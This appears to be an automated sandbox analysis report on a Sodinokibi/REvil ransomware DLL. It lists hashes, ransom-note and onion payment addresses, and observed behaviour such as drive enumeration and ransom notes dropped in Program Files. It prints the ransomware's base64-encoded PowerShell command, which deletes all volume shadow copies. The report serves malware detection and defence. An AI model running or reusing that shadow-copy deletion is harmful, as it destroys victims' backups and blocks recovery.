Analysis
-
max time kernel
91s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-06-2022 22:34
Static task
static1
Behavioral task
behavioral1
Sample
3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
Resource
win10v2004-20220414-en
General
-
Target
3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
-
Size
164KB
-
MD5
d5e42a58e793d9b488f46d77b38f92af
-
SHA1
433b8d938d3778b07c36b998eff618892e83236e
-
SHA256
3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981
-
SHA512
6de37ca575a7859051ca4db0a8691843a11a437bd0e592ca1da04ddc5380103baea1d0cdc95e3e2f3ac345f35b2479bc6aad1ac81929a45b8219f5931c870b27
Malware Config
Extracted
C:\u0o56tez4x-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9F0AC63999EFF22F
http://decryptor.cc/9F0AC63999EFF22F
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe -
Drops file in Program Files directory 22 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\ImportSelect.wdp rundll32.exe File opened for modification \??\c:\program files\MeasureRequest.wma rundll32.exe File opened for modification \??\c:\program files\UnpublishConvertTo.ADTS rundll32.exe File created \??\c:\program files (x86)\u0o56tez4x-readme.txt rundll32.exe File opened for modification \??\c:\program files\CheckpointPop.snd rundll32.exe File opened for modification \??\c:\program files\ExitDisable.mhtml rundll32.exe File opened for modification \??\c:\program files\LockConnect.mhtml rundll32.exe File opened for modification \??\c:\program files\MountResolve.dwg rundll32.exe File opened for modification \??\c:\program files\MountCompress.vstm rundll32.exe File opened for modification \??\c:\program files\RepairSync.svgz rundll32.exe File opened for modification \??\c:\program files\SkipUse.dotm rundll32.exe File opened for modification \??\c:\program files\StepCheckpoint.shtml rundll32.exe File opened for modification \??\c:\program files\TestRestore.vssm rundll32.exe File opened for modification \??\c:\program files\RestartWait.MTS rundll32.exe File opened for modification \??\c:\program files\StartStop.M2T rundll32.exe File opened for modification \??\c:\program files\TestAssert.emf rundll32.exe File created \??\c:\program files\u0o56tez4x-readme.txt rundll32.exe File opened for modification \??\c:\program files\ApproveGet.wmv rundll32.exe File opened for modification \??\c:\program files\CheckpointCompress.raw rundll32.exe File opened for modification \??\c:\program files\ImportGet.asf rundll32.exe File opened for modification \??\c:\program files\ImportSkip.mp3 rundll32.exe File opened for modification \??\c:\program files\WatchEdit.tiff rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 2688 rundll32.exe 2688 rundll32.exe 4500 powershell.exe 4500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2688 rundll32.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeBackupPrivilege 4004 vssvc.exe Token: SeRestorePrivilege 4004 vssvc.exe Token: SeAuditPrivilege 4004 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3392 wrote to memory of 2688 3392 rundll32.exe rundll32.exe PID 3392 wrote to memory of 2688 3392 rundll32.exe rundll32.exe PID 3392 wrote to memory of 2688 3392 rundll32.exe rundll32.exe PID 2688 wrote to memory of 4500 2688 rundll32.exe powershell.exe PID 2688 wrote to memory of 4500 2688 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/4500-134-0x0000000000000000-mapping.dmp
-
memory/4500-135-0x000001EF476E0000-0x000001EF47702000-memory.dmpFilesize
136KB
-
memory/4500-136-0x00007FFA587E0000-0x00007FFA592A1000-memory.dmpFilesize
10.8MB
-
memory/4500-137-0x00007FFA587E0000-0x00007FFA592A1000-memory.dmpFilesize
10.8MB